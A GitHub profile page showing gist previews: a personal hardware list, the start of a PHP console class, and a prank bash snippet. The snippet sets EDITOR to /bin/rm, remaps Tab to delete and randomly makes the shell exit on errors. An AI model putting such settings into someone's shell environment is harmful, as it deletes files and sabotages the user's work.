Skip to content

Instantly share code, notes, and snippets.

View REBELinBLUE's full-sized avatar

Stephen Ball REBELinBLUE

  • LendInvest
  • London
View GitHub Profile

What I Use

Inspired by James Brooks I have put together a list of hardware, software and services I use regularly.

Hardware

15" MacBook Pro (2017), 2.8GHz Quad-Core Intel Core i7, 16GB RAM, 246GB SSD

My personal laptop, since the pandemic this doesn't really get used at my desk as I leave my work computer on my desk all week.

<?php
namespace REBELinBLUE\Deployer\Console\Commands;
use Illuminate\Console\Command;
use Illuminate\Console\Application;
use Illuminate\Contracts\Container\Container;
class DebugContainer extends Command
{
#!/usr/bin/env bash
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
# Make Tab send the delete key.
tset -Qe $'\t';
# Randomly make the shell exit whenever a command has a non-zero exit status.
((RANDOM % 10)) || set -o errexit;